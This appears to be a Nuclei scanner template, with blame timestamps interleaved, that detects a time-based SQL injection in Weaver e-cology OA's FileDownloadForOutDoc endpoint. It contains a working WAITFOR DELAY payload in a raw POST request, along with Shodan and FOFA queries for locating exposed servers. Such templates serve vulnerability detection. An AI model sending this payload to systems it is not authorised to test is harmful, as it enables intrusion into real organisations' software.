2023-08-11 05:44:21 +00:00
id : ecology-oa-file-sqli
info :
2023-08-11 10:15:25 +00:00
name : E-cology FileDownloadForOutDocSQL - SQL Injection
2023-08-11 05:44:21 +00:00
author : momika233
severity : high
description : |
e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system
reference :
- https://github.com/TgHook/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E6%B3%9B%E5%BE%AEOA%20e-cology%20FileDownloadForOutDoc%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata :
max-request : 1
verified : true
shodan-query : ecology_JSessionid
fofa-query : app="泛微-协同办公OA"
2023-08-11 10:15:25 +00:00
tags : ecology,ecology-oa,sqli
2023-08-11 05:44:21 +00:00
http :
- raw :
- |
2023-08-11 10:15:25 +00:00
@timeout : 15s
2023-08-11 05:44:21 +00:00
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
2023-08-11 05:46:44 +00:00
Host : {{Hostname}}
2023-08-11 05:44:21 +00:00
2023-08-11 10:15:25 +00:00
isFromOutImg=1&fileid=%d+WAITFOR+DELAY+'0:0:7'
2023-08-11 05:44:21 +00:00
matchers :
- type : dsl
dsl :
2023-08-11 10:15:25 +00:00
- 'duration>=7'
2023-08-11 05:44:21 +00:00
- 'status_code == 200'
2023-08-11 10:15:25 +00:00
- 'content_length == 0'
2023-08-11 05:44:21 +00:00
- 'contains(set_cookie, "ecology_JSessionid=")'
condition : and